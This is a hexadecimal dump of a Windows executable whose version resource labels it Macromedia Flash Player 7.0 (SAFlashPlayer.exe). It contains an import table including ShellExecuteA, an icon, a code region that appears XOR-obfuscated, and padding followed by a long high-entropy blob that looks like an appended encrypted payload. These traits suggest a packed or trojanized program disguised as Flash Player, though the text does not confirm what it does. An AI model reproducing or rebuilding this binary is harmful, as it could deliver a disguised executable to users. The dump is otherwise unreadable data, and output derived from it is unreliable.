6573730000006C737472636D7057000000496E7465726C6F636B6564496E6372656D656E7400000047657456657273696F6E4578410000004F70656E4D75746578570000005465726D696E61746550726F6365737300000045786974546872656164000000436C6F736548616E646C6500000052656C656173654D7574657800000047657446696C6541747472696275746573570000004765744469736B4672656553706163654578570000004765744D6F64756C6548616E646C6541000000446576696365496F436F6E74726F6C000000496E7465726C6F636B656444656372656D656E740000005175657279506572666F726D616E6365436F756E74657200000047657454696D65466F726D617457000000577269746546696C6500000047657453797374656D4469726563746F727957000000476C6F62616C416C6C6F6300000047657443757272656E7450726F636573734964000000476C6F62616C46726565000000536574556E68616E646C6564457863657074696F6E46696C74657200000047657450726F636573734865617000000053657443757272656E744469726563746F72795700000057616974466F7253696E676C654F626A656374000000466F726D61744D6573736167655700000046696E64466972737446696C6557006B65726E656C33322E646C6C00000050726F706572747953686565744100636F6D63746C33322E646C6C0000006469666674696D650000005F69736D62637072696E740000005F6D62736E62736574006D73766372742E646C6C000000497352656374456D70747900000047657457696E646F774443000000536574466F726567726F756E6457696E646F77000000536574466F63757300000047657457696E646F77496E666F007573657233322E646C6C00000050617468497352656C6174697665570000005061746849734E6574776F726B5061746841000000537472436D704C6F676963616C570073686C776170692E646C6C0000005368656C6C457865637574654100000053484765745061746846726F6D49444C69737441000000534842726F777365466F72466F6C64657241007368656C6C33322E646C6C000000000000000045003E00420034303D0000443000494D434B40484B41004200333D4A000030004E443800363E4F313A4541470043363B3B4C003E313D363D3B4F3040310043433D424638000041004E37004C423E49003A313D3C35453D3A00004746003D373A4500004D00393C3A380044410037394147320036004C004237004D410041374300003936003733420000384B4534384C313C393B3D45004732003A4C403E4F3E00004C4F36004141433100420049000000003E4F4E3A3F3E3500374236314000453739433200444F4B48003100000046413F3D4D0000000000393F4447384440424B4D3247003B354034373841004147003138390041374D4D48423800004F40453D334B4C00340036493F4C00000044004934004A003D3F433832323732004E440000424B333C0000004900003200333E3A0039324A383E3E3D3000004847463742323B49003F3C3A4600004F4B30433246003E3000003D30353139004A444845004800443E004238004D4B3C36470042004B0040463A00000044003D00450000393F30334F4400490032004446313C0045323D3800004000004B343E32343F43483E43380035434D3B46454C3B0000464F3245370047004C00363535003A36440000344C4E414F004B4A0048470038004E300030340038003B4F4D474E46373D4C463D4C003A004D410039003140460000354900003C3741003F4A003E4B00003C3500354C320043434B353B3149334D484840493E4700330032004D003F30453F4245403A33453200483547493E4C493E00433B003744003331494C353A410044300037004332000000430030000000003300003B35003346003E403E00004A49343000424D4600373943463E00433D0031473C004F3300003A000043353D3E360036003A0035000047333E0039004D3900493B34000037474A4A0000313C4D3000494639470032404749464542463900003D4B0034004A003B4C3C003E0000473747003B3500000030404F413100414448394A4D3E004443003F0034383B44373D3F4E00404E000034320000474246003A384F00384A003D004F314D0000004A004340414D490039430042000000000000373A004B334C3100000044363045344B34383A3D000032410031484C423D4E003D354E000039333E3D3132004C00473A343D0040413749330041480000004A3B000043364C3D4C00324C003A004900004300004A003100004238493E303C00483841004A314C3646423700003E003A4B40004B45000037464A4E37423A0000314C00004C3A4F35004C4C4A3F004E00384B3D40353A3B444D4A3600400000324E003600003639433A0038004B003B46003E473044004B3A323B370038004F423D4142463248313100000040493D443A3F3D4C000000433542434E314D424E003D4C3648003F4200003500423A0032000000003A003B000031363B3D38003600323036000039433237004B4A3D44003937003E410000004947424746334E000038474736003E004300003F004E4F003C4D4434003B0043394700000049484A37343800004E00003836413A4D0049413C3748324B473A3D0033003E000037003547383B310000003F003742460041483C314C4E004C0046474E354042353A480000404B3141480000373F373A373F000000343100004C000000343D404C00383A414C0042380049364F394A39473F4448350037354644003200003242003E3D40313D333F003700440000004F3500000048394D3300004C334B0000423C4B4C00390049403C4F4145324A49003100443300004D004836004A00330044000036343900420045000000310034003A4A0000383A003A4A3A3400363700004C3D0044004135004533414C4400353C003E000000340044000045003800313D3C003C0040003D004D3B37003939004845000000003F4B003C394C464939003C004000000000360000453538003446003F323C43343148000030003700494D470049383D314B4F310000334B4631004838353500000035004B304C32003500473A314B3C0000003D004340000039004D003137323437353648004E00370037304D4B00003A3D003500003A003146354A3E483C3B00380042004F43410048373A00473100324C40000000420041343D36470041000040004E4932004A00003F4B34000000373543393A004A44004300004C4A363F3F4B00000037003D00314D443B4C363C4F0000003B4C32363231364B4A4F4747314D353C423030003C004A4C00453C0031004A003537000040414B30003344324B4C3C413849483E004A003C00483B4F3339383E0046464D41004D400046434F324535003C3E4B3332003642000000420000323A373846354D4B3F4D413F414745414E33393E004E394333423C4900314C350040004937003E3B3300403A3D470038380043000043003F303D374A4A003B390049303D0049003A4B4A0046004B003F003C3B00474B4238484137000047003500003B4F00393A00464F333F00424B4D33004742003B3E404400493D00003E49384F3C4334004000004B0048003D3C003F0039000030303E004E00004D4F00393E333A4D463D32340000004C000000003F384E00303F433B004F330037400049000044303C4B41493F41483F32414D4F4E0049360000340000403942454300003F0049003141314E3A3F00003F334C004C363646000000304B3B0000374949470030003B00490033003E374C30343B363A49494C3F0036350042303E004E3B48003B32303C004D314449000000003A3F4D49003E00493534004A40004200373B00434300004A44334500004845324439003F0000414A45004D00000036003D0042003A003E3F36004035004B4F373A3D004F0030423C4544314E334400350000333F403E493E0038484A43003B3100414F0000004C480000004544404A003E32310047464D4D00003549003500494D003B343C4840003C4042004344003334004E350000003B454A004100003B4D353B3947004D4A394500400043003A42003C004548003F3B45003100404D4442333E373E000000004B4600443A384D003542464D4400004F3839003A4533003800003400330047000000363630344F4139003700434731484338004441003B453C004C32403B464D473937363C4C4C3F4D4D4200473D38433336430046003500323C4300420048373D3A3D004700374A004C4A3F40354D4A000000433300494930474300324F004F004D4900454A493D4F3E4236473945004B353F0041354B484F3E0000473B393238480000424D4F43463100443F37444B4940000045383939000000394B4C444A4E003A42493D00493B0000474737474042003F00444A0000340041004F463538004A0044003D334947004E4700344600003B0000393730000000003C004C3F4F004B00330000353539364700474A4800004B003B334E3733454B4C00434A47443434373C00004A4F363D00333E004B3439344800354E3700474300003C344600003F0036303B3D003F364643004431004E343300003E423800004B33370043323D3B344542464A343C00424F000032000032004A480042000043003C36000033394133004448470035003D3A00484E0000333F4B43470000394736003D384A00363500000045004700004849373A41484D3F35463000004B000000003A0000353132004A34003800003B3137473C483B004400353F00410048414A000000480043393F00303A00403A4C304C4C453700004B003C4C47003D4D3F4748004F00000032003F000000420030003F004F40003600334400003D31003A4D49004F4749443449433D00353D3D423A4B364E413B474944480000003B35434800000000003D353949004A44003E3600003E004800304C49360033394200440039414F31004700463B49000041004A4300004A3B3C30004C32460032003F000031003B3700003B0043454A47403300344A314341364B0040340040303700003F3C38004D3D3A0045363E48343B484A00003846004200404200000000000000003342003700004500334600410030360000354C464C454600454A4E360000000040323F363A00433937303A3F3F48430048004D4739363D003D3A454B4442314B0000330042434F33004B41354E00464F000042360047444900004440443A00443A3A36314C343940003B4500453B003042324541404600000047004A31004C36003C3F4D350037004B460049334D00393434003541484E00004A4F4D4D490032350038414E00004A00004235324A3A444E323D3000003C48404700003F0000334C003400354B314A4400004B48000034413F3B00360036314C4200494B450033373034493B000048003200454A404E463E00004D4C303A4B49003B33003A00303B45003400443000003B3200003E00363941313A0043443C4B300036003F4C3534340000350030004D49003B394A3A003C4F353F3200003B470000363B44000048004000004B4B4300400000003F4D0030003146433E483800004E46004943000000003A4D414C003E40003A000034003F434F34004A3C42424E0044463245344300004100494D304E0044004B004735003600364500424F000000444338330000004900474B3A4D00004F403800303D4F344800453600003D4A333E3835004F43353B313234363F44000000000032000048003F0000334E4D0044000000354F0000444E00000000330039434E003F3E494A444D4B373833474900003D3E00394E4D423D4C303B43003D424200494A310000433F35493A3B3639364900374B0000340000004A00494C4C3545004100360000453400003630343B000048003E00464B34484D4A00320000000035433542303F4F434B003E00004E35003D374C4A4F4C3B0042003A003A0000303800004F36000000484D374C004730004A4D00004C3948324700000044454743003A433D4533453C4D343B3E4C0000003A004E4B003300000000000046003F00000031493C00003C00004243380036004F47430000003C304C343F4B004D004400360000003B3949433D454F3C3F0039004D00333A30393E403730470000004D4F4D00003441334C480041410000304E4F394441383A46003C003D423A4F004A004C3A394C00004E003E0037393D004A32004D314900333A4E3E000000004849470035003943004644000000000033313D3B3C3D00363B004B4C404400004B35380000384133003C4E0000000030000000004F3B444B3D4E3F000043004748000031003943413F33003F004444004C003C38304E393F3C00303800443D45343F344035403730450000000045333B003C374A00443D330039343C003A454B46473F363E44004D00003A004D3500450048004E4B4C0037003C40480034464B003745463900004A3B324E00003A333700333D41004A004B0000003000473E004B00004638443D004E4C3C4C0040350032003E494E3D0047350030384D003B313536483400000000003A3D0031000000393334004949403D0048000041493B3B003C41330000433E00383A004E00343B3A494200444B00373D49474A003D004D3C3600334547004A0000004A003F43004300004A00000000493E004900004D00413900004B3D4800353700303B3C304F0000004600423536464400004E3345414E410000003945000000004A3D434D35004A0000000035433D3D4E3249004F490037003E0000000000414F3F3A004148440037380000464548004A30433D0030004B3C374A3042484700000000004047484143484147004D44480000440033004149004933303035320000484B00003F343F494B3947003C00003100470048003639464D4A00443D314841000000003E3E494E0000430000000033493B493800333939463C46000030423E373F4334000000003F493C003339480000004546003C3548343B340032003E4A300000004534414C32323B3F3D434F3E0047004900004344003E393C344F3C393943404942313A3B4C3B353100384D314300464F4144004C4436004A4000443A4630443735004B0000000000004E37003F00444E4400003A00004D0000320048340047004631004A3F4E4600480000003C32003E004D3A324F0047003900000000324239000033364C303A4C454B4E003F3D4D3C3F004F4B320000004348003F3D000000403A4B46004A000042353C4E42004F313F003D4A0000473C4036000031373148473638324C003D4B3C0045003F00423140350038490032303F3E39003F00004C00004E3B384537003F373D004900480000003037394E3D004F303E443E003A00460000004E004C004D3C3200000048003200313431323331343133333400003131333231003032343000303300320033300034343131323000323134333030303433303034313334003431003033330000313232300030343433323131323131333034003434000031003234313034323400003034003031003434330034333334333300003334313233303234320034003100340031000034343430333130320032303200343400303034323331000030313333323230313400313334003030313133003331303234303032313333003431310033343232310000000030333333313400333030343200323134310032320034003400313333330033330000313100003233333000333234003100340034313031343031333130310031303032323031343230343132003133003332003233323100323300323234313433000000303232333233323133003330303333323230303431343230303331313332323032003134313134320032303431313100313400323431320032303230000000343432003300300000003333323033323332303033313100003034323430003200333334313131333034323030003430340034003430313330333032313330343400323430313234303100343132333233000031313233323233003100333232303332343434303431003133323131003134343400323333003400300034313231003232333033343432000033343430313400320033310033303430323331323232303132323031303230320034333134333331330034343431313431333434313264EA7047777777EA376BEA0763C8EA3767B2EAB713EA7047777777EA376BEA075BC8EA376FB2EAB7211EECB1EC9EECAF3C7EFE620346B47C75FF4D82D0ECB4F2947282D31619B2E803447BE8FB3C7BB47C75FF647882D0ECB4F29472F2B172F2AE7282D37B1619B222211EF2B37FEA9F42B7EC33537342818A6D50767777777433537331ED7342F3B70086EA3353737E0B53737E0B53737E0B5373EC335373EAA3E8335373BC737777778FFC76767629F081FB3A314276ED633AEAB545735375335372EF7353EAB54533537475335375EF335374EAAD452B537575AFEF2B537545235372756353EF2353722E2900AFE8235373EAB3BC737777778F4C767676EA3353731C1D16191AB2E8377722211E20F2B387EA85EC735342B7EC335373F27974006E8F8B797676EA9FF27975006E8FAB797676EA9FEA323B72B2EA37FF72B2EA0F57728AEA275B72A2EC23536FEA275372A2EC23536BEAFF5F26F076FB492E4281EA33C07772B28F7A7976763A7353005EEA33536B66BE7307EA23536FEA73F572B2EC3353738A73312600A0EA335373F2B3671816191AB2E8377722EA1F5BEA3757EC326BBD74777777BF0AEB31D18F1E767676EC72BD74777777BF490C00C18F31767676EC326FBD74777777BFB8DBDD518F43767676EC324BBD75777777BFBF2AEF6C8F55767676EC3267BD74777777BFE26E848D8F67767676EC3263BD74777777BF6F1F4A458F79797676EC325FBD74777777BF0986BEA48F8B797676EC325BBD74777777BFDCDB07A68F9D797676EC3257BD74777777BF4B756BCB8FAF797676EC32531AB2E8377722211E20EA84EA8DEA9FEA7A1E0D767621670F77F777770D771E0D767621570D370F77477777201E0D7676216B1816191AB2EAB722211E20EA84EA8DEA7F1E762153EA9FF09A006D0D770D771E76215FEA9F202276215B1816191AB2E8275F66BE376372A7EAB5B2ECB413EA7047777777EC2F6FB2E8377722211E20F2B38BEC2B5373EC735342B7EC33536FEAF5F7777777EA43537287EA316B727353EC33536B4276F239770070EA3167EC71EA7172735372AEEA5FF09A0320F47A777777F7026BEA735372B2EA8FF2B0758A6FF49276767777EA8AEA2B5373EAA0EA33536B8F26767676EC335367F2FB5367770343EA316772735372AEEAA7E8335367BC737777778FA37B7676F2AE73F09A00D9F2B163F2F96B7766F0FA767676AE33536F74777777EA33536FF2B3631816191AB2222124E7E7EA87EC6B5342B72DF0A5055F3542ACEA5B53ED5B72475B6937F27F67007542B7342D008AF4414922CAF51D191AB2E720EA8BF2B38722211EEA9CEC207FEC307BEA286BEA2067EA307B8FC8767676EA007BEA313B72307BEC72EA72EA2727EA72EA3743EA286F8F17797676EA207FEC75EA307FF23F77030DEA72EA2F23EA207FEA65EAB18F597B7676EA728FDE797676EA87EA7266BE37712FF0B7053037EC3087429AEA207FEA65E83BDA7223796BEA2B7967EA33796372307B8F8F7A7676E83083270D37EA33796F27EA307FEA777233796B270D76EA306F7627633276288700B416191AEA9018B56B772122ECB113EA7047777777EA376BF2B76BEA773A075F007CEC275FEC2F5B1A19B2E8377720EA8BF2B38722211EEA0067EAF96FEA195BE8316BEC30870D730F774777771E0D770D7676226BEC3083EA2083EA3173EAA68F147A7676EA306B270D767622671EEA30872722E8287BE8207FEA30838FAB797676F2F87F770325EA207BEA254FEA307BEA374372A7EC2087EAA7EA2887EA306B8F13767676EA307BEA37438FD4787676EAAAEA207BEA307F8FD3787676F27F74005EE8307F270D770D77EA3087270D770D7776620D7476226F0D7976224B16191AEA9018B56B77EAB720EA8B2422211EEA87EA39BA77677777EA295BEAA242B78F937B7676EC307BF2F87B770334EA207BEAAEEAAA8FCA7D7676EA187B4A96228F777777771FE858836137774C9FEC307B1AE7BD7B60377772207B72A2ECA7B677773777211E2276A7E870EF6737770D77EA315B76277316191A1C18B220EA8B2422BD74777777BF91C2052A8F3F7A7676EA9F0D730F774777770F777377770D770D7676A2EC307BEA307BEC1F57EA307BAE7777373777EA307BAE377316873777EA307BAE376FC8CA77778F677777777741777732293849321A7749633E565AEAF87BF2AE6B19BC6777777782D30D730F774777770F777377770D770D7676A2EA207BEC355BEA307B1A1C18B2228F0D767676EA9FEAB28F387A7676EAB28F917976761AB247333433313433300034313100323134313331313332000033303100340033003234333134323300003400313030303432323130323132333031313100313031303000003233303333003432303433333331323332343430003000323100303330303031003100323234303432000000333234000031340031343131313330003331003032333100313131313233313333310030310030323130323232323031340034000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006912400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000030003000000280000800E0000004000008010000000580000800000000000000000000000000000010001000000700000800000000000000000000000000000010001000000880000800000000000000000000000000000010001000000A00000800000000000000000000000000000010003040000B80000000000000000000000000000000000010003040000C80000000000000000000000000000000000010004040000D8000000E8E00000E8020000E404000000000000D0E3000014000000E404000000000000E4E30000A8030000E404000000000000280000002000000040000000010004000000000000020000000000000000000000000000000000000000000000008000008000000080800080000000800080008080000080808000C0C0C0000000FF0000FF000000FFFF00FF000000FF00FF00FFFF0000FFFFFF00000000000000000000000000000000000000788888888888888888888888800000007FFFFFFFFFFFFFFFFFFFFFFF800000007FFFFFFFFFFFFFFFFFFFFFFF800000007FFFFFFFFFFFFFFFFFFFFFFF800000007FFFFFFFFFFFFFFFFFFFFFFF800000007FFFFFFFFFFFFFFFFFFFFFFF800000007FFFFFFFFFFFFFFFFFFFFFFF800000007FFFFFF00000FFFFFFFF0FFF800000007FFFF0F0F00000FFFF000FFF800000007FFFF0FFFFF0400000000FFF800000007FFFFFFCCCC0CC0000B00FFF800000007FFFFCFCFCC0CCC0BBB00FFF800000007FFFFCFFFFF00CC0BBB00FFF800000007FFFFFF9999000C0BB000FFF800000007FFFF9F9F990100000000FFF800000007FFFF9FFFFF0990000200FFF800000007FFFFFF00000999022200FFF800000007FFFF0F0F000099022200FFF800000007FFFF0FFFFF0009022000FFF800000007FFFFFFFFFFF00000000FFFF800000007FFFFFFFFFFFFF0000FFFFFF800000007FFFFFFFFFFFFFFFFFFFFFFF800000007FFFFFFFFFFFFFFFFFFFFFFF800000007FFFFFFFFFFFFFFFFFFFFFFF800000007FFFFFFFFFFFFFFFFFF70000000000007FFFFFFFFFFFFFFFFFF7FF87000000007FFFFFFFFFFFFFFFFFF7F870000000007FFFFFFFFFFFFFFFFFF78700000000007FFFFFFFFFFFFFFFFFF77000000000007FFFFFFFFFFFFFFFFFF70000000000007777777777777777777700000000F0000003F0000003F0000003F0000003F0000003F0000003F0000003F0000003F0000003F0000003F0000003F0000003F0000003F0000003F0000003F0000003F0000003F0000003F0000003F0000003F0000003F0000003F0000003F0000003F0000003F0000003F0000007F000000FF000001FF000003FF000007FF00000FF0000010001002020040000000000E80200000100A80334000000560053005F00560045005200530049004F004E005F0049004E0046004F0000000000BD04EFFE00000100000007000000130000000700000013003F00000000000000040000000200000000000000000000000000000006030000010053007400720069006E006700460069006C00650049006E0066006F000000E2020000010030003400300039003000340062003000000042001100010043006F006D00700061006E0079004E0061006D006500000000004D006100630072006F006D0065006400690061002C00200049006E0063002E00000000006A0021000100460069006C0065004400650073006300720069007000740069006F006E00000000004D006100630072006F006D006500640069006100200046006C00610073006800200050006C006100790065007200200037002E0030002000200072003100390000000000320009000100460069006C006500560065007200730069006F006E000000000037002C0030002C00310039002C0030000000000058001C00010049006E007400650072006E0061006C004E0061006D00650000004D006100630072006F006D006500640069006100200046006C00610073006800200050006C006100790065007200200037002E00300000007200270001004C006500670061006C0043006F007000790072006900670068007400000043006F0070007900720069006700680074002000A900200031003900390036002D00320030003000330020004D006100630072006F006D0065006400690061002C00200049006E0063002E00000000005800180001004C006500670061006C00540072006100640065006D00610072006B007300000000004D006100630072006F006D006500640069006100200046006C00610073006800200050006C00610079006500720000004C00120001004F0072006900670069006E0061006C00460069006C0065006E0061006D00650000005300410046006C0061007300680050006C0061007900650072002E006500780065000000400010000100500072006F0064007500630074004E0061006D00650000000000530068006F0063006B007700610076006500200046006C006100730068000000360009000100500072006F006400750063007400560065007200730069006F006E00000037002C0030002C00310039002C00300000000000440000000100560061007200460069006C00650049006E0066006F00000000002400040000005400720061006E0073006C006100740069006F006E00000000000904B00450414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E47504144443C4000383D004D003D0043373A003F004E4100003745004B00003E463B37004A00413F004D4749000000364A3E39003E33003B3142464400334F0000423E00000035004E00004D3A4130004C0032453400004B444400004449003500430000633F3B82404E3D2E475B002EEBC81F1BB8360000434E3D2E035B002E14371F1B00360000434E3D2E435B002E14371F1B00360000434E3D2E435B002ED4371F1B0E29BA0E43FA34E362E30162D9164B736945207031215A5C2236204D7559717474166265633C484063326E0E50784C3B6D5964656D433024675B002E14371F1B633029DE64297AA3643C47A333505896A94E548D22297AA3981C55A332505896E057418D65297AA3113263463350589600360000434E3D2E435B002E14371F1B507300000F4F3E2E52D7D26214371F1B00360000A34E322F485A052214971F1B00260000431E3C2E73A0012E14571E1B00360200434E7D2E434B002E14351F1B04360000434E3D2E475B002E14371F1B00260200435E3D2E435B002E16371F1B00361000435E3D2E435B102E14271F1B00360000534E3D2E435B002E14371F1BB8300200574F3D2E435B022EAC311F1B00360000434E3D2E435B002E14371F1B00360000434E3D2E435B002E14371F1B00360000434E3D2E435B002E14371F1B00360000434E3D2E435B002E14371F1B00360000434E3D2E435B002E14371F1B00360000434E3D2E435B002E14371F1B00360000434E3D2E160B581E14371F1B00660100435E3D2E435B002E14331F1B00360000434E3D2E435B002E94371FFB55665831434E3D2E43FB002E14571E1B00A80000434A3D2E435B002E14371F1B00360000034E3DCE6D29735C77371F1B00260000434E3F2E4353002E14951F1B00360000434E3D2E435B002E54371FDB00360000434E3D2E435B002E14371F1B00360000434E3D2E435B002E14371F1B00360000434E3D2E435B002E14371F1B00360000434E3D2E435B002E14371F1B00360000434E3D2E435B002E14371F1B00360000434E3D2E435B002E14371F1B00360000434E3D2E435B002E14371F1B00360000434E3D2E435B002E14371F1B00360000434E3D2E435B002E14371F1B00360000434E3D2E435B002E14371F1B00360000434E3D2E435B002E14371F1B00360000434E3D2E435B002E14371F1B00360000434E3D2E435B002E14371F1B00360000434E3D2E435B002E14371F1B00360000434E3D2E435B002E14371F1B00360000434E3D2E435B002E14371F1B00360000434E3D2E435B002E14371F1B00360000434E3D2E435B002E14371F1B00360000434E3D2E435B002E14371F1B00360000434E3D2E435B002E14371F1B00360000434E3D2E435B002E14371F1B00360000434E3D2E435B002E14371F1B00360000434E3D2E435B002E14371F1B00360000434E3D2E435B002E14371F1B00360000434E3D2E435B002E14371F1B00360000434E3D2E435B002E14371F1B00360000434E3D2E435B001D3A072B1B556658214E473F24CAA6F5CE44BE70F5A4E3010068D53D2E43E9012E32371FEF76C9FFFF16C5D17F140DFCA5593B9466088600F3E91062778A99082E03644DA495DBFF19C333292F365AFD0E04146A13F392FC5BB4974B0C1900243E43642818198575B744B53DA65C005F1742604E27B83600832DB1BE935A5B76334ABD5A0BF2984F8A44743A5A447DDBF5D329F4198BF14A591C104F22BC8632C82E5D1717293075120408DFD8FB5AB2F98A44333D761E3A0DBEA3E5F375D8C4D666BC5A91453A8945BBB1C6F5F1E6A7A151CB630F4022108A5BC4FE7E50E4FDF3793B1DE7E80C4E0B833A14A5BBEE141569CF6804646DB61F6CB2293053DC83D6150094C6FE42178B1EB27EA740B0C043B0C53D78C9004DFC4837C1D3D5B6D644EC432B1E101876746BF850E3DED04872D8720BD05052EFDBD4215C60432E0B61693F6CFCBF683B428140387A383100EABAEEE280873A83C3411D576EFA78440E46D0212C6B2FCDE70C5AA8427053EE43728C157D892E0CA14BA0D3A8BCDAC4EEEAC8E0733E748D8581446DC6445EEFF5A757145A22D291FF37436D24D07676AACA5BF41EF77504CF3DB5E32EBF69057E685F594B4036392365A561F5365580077E35171109F627D88BBD3879ED409C3878F58D16CC6A1401326FE599F358F4D0E06A24279B0B9D5E400E45747BD27998CD14F91F75387F94BFC806271E388D2BC827EA38C83193D0F991BA44420C8B2C79C7DCC1EB506904BB0D5B4472C239BE94737F197CFD258C27B6A837B72FF0767587D102F4116E47147364D9F3208B7B6DCFFCB76A72966D80F80F92BE2D0344043DB370F788AD6B25FB5B1BAFF2E83B308BF99DBDAC0197471E6F02B5746B53B8C828E477325D0409A375438A5327AF1A344FDDA9DFFF803DB1615A46E85CA60A71B3053F14BD2E1510C5D572F68522DDC770E807CA83BD464932AAC0C7D23E6A14290ABF2A68FC414E82403CD5C2030549C753E912050E402A75604254D96732D31D6E1912EB746269AA228A583A7C10F96103C843137963A50B3546ED35D75E09F4015E2754F4F191260C5877500617E5D91A33BAD70F2D73E944F62DE34B139F14191F3E754C6ACAAADF40BD83EE16673C34896C65DF78161DD1F6571BCE1E2AFE76D9D0167CA85CB6AD03D220EA7ABF1928042A8B42FF737066955F2D971F3BD9F19E87AF3AF54DC35D6D86FC28AF44DA4022A66A42135E6D5D0E89E9311A14CB205BFED74A4546E057BEE381E8676FBC0FC73010C74463E271AF5E445815BA9630FC7BD8D9719268A14433581F505070F47A4E01384E88CAFE680EFCF013B4E57B974A1BA35C633B7C689066D122343C1D8B303B0736484F8881A41BB2046F17276144063C39393F02634DDB986F3B4CE5F0DE018E4F4629C58B5D233A4F2F0F20505B6C5F3B3938156E2D02C5739B03B231EDED5B9C424E3DC3640D6494481E11CAB63E044020E3F4AD1CEB373D440B171739807E4ACE02D5DEDA5F2A5D71F41BD2A906BEC996B7284AEEF4282B0FC76E1A984983BA53A27CA4CDEDE2CBE017B2A82E3D8C82FE4A94474A40DAA15BD6FBB93E1014DDB1FDEE0F6408C50FC86A03FFC2ED079CFFEED61434D2860470A7178277ECFC35AE6A6509545E67F62396347A0630384AEC3A572D7E62CF9AD6A6E40034A27DB48EC5A582ACD06676644E9633E4B91DB081D3F5FC8FF7DF9FFFA7BC4172F7E2C89F373A48705991A982D70536BDD9F721C5FFA590025910C9F666C7FEFB680442CAC7D04CED0A6DC362ED2203F9CB4A8C583D6098BC3B91AEBA0047033691F4BD4FAEE38D6D2BDA1E7A2D51EDD8D88BD66AC27C4E531E2DBB03AD6772CD7A68504E3D21F49BE04F17FF1FFFE87A32038B78310AAFABF6006661B01EEC2D094EF6AA3635207736CE11B356E6109E3883078DCC0EDD572E901626D5F31A5416AFC7C2F95A48509CAAB0C0199210597A0762B0056823ED423CAE1838F6FE288D294B738A6D36564727748529909D780238AB6026D286C136C49FEF7DE728655FECB5BB05190254EC7E4C26E75F892E3427CE2874CC44B52A43BADF4F0B835370BAB16F38C4A4306C4A25F8D323A78DDBA953FD5829690D8329E85B36FD289609BB1344C16CE440D87813751B18F3DDD18B5A4464F5BB0FBC5850F5EF73E852B5466744F4C8253685A283A3D2E308AB2E8B676A7A6EB47B0C182D251B7FE65C222E4428328D6F7E4023BE445257601604515B4143AF255C6D7F973E154611399B6DDB48E68891D18B0ADF41DCFB7989391613CCD997AF3F2D5A74E2B8193A2D90BD3675EC784A52CC16D0B52445E4EAB23D78263199604FAB2E782ACD26B3034815590925345F826E1D4794090E681F1A38B052F4DD66661D17DDC403D258345471CDAA5430A45B6DBCD84E91FF79B8A8B1E7AA44A0A7E19698CF0B3BC42F427FA39458C946E0AB49DD1FCE104951950B5264BDAD124C61A30D2B14BC204E060FC913429E44C598404EB82489D80D2EAB0D47CFCAD1567ECBAD2F3D9D985BBF760396F76093690B52B7E014541B2B23F8F7906DFE7434461B9D7F816238D8B5FB724D1DEF23F52E6414241B4992220F7430D3F44A5944A54622CC574981C0142210E3FA8D2874A527BEA2B29CD24D6144F2142581C278150E316D4204187F0A130DBC622B45B35CA9515581E15697133C4A616DB6D6C09C0444001A64F6C8650B3F800D225C9ADFD17950BE0B73E0FDBA2330687A26C405885C75DA64114164884264185D59C2AE5F3E5234E43245A06C2B044743740550C14BF93CCE49D21DD1B3AE70CCF083FDB8A6113CE016B2EF2E84461D3530437E8D51EC55F31C0AB439082C205BA55FC90B59F90D9EF836051F031E24397D2FF67E3553161B2166F7E841D54D0E5AFC8B03C504BE1CF0323802334F8340952E3D1148041679360E262BB6D3A55C3D4E3D603F122B5810FFEDEB055ECDFF2C780C045C998C1B60248E10614CD5CC4C1904847C9249C617605E1015F5BEC5D878A3013E7C62EA71F85EA07FBC4A30EA4D54FBB9A3A0E80B55311A05934F6023163388214B334B98FF6D22F3B026693F4F518BF89F7960A0F589DE8048E28D467DA8B19136DD0EEEDCB5EC70C8B20BD61CA1FC44706E1077D64501ACE9ACCBA5B1205B9551CC3241AC66503C25ED5712245EFED1238FCE27EA403C9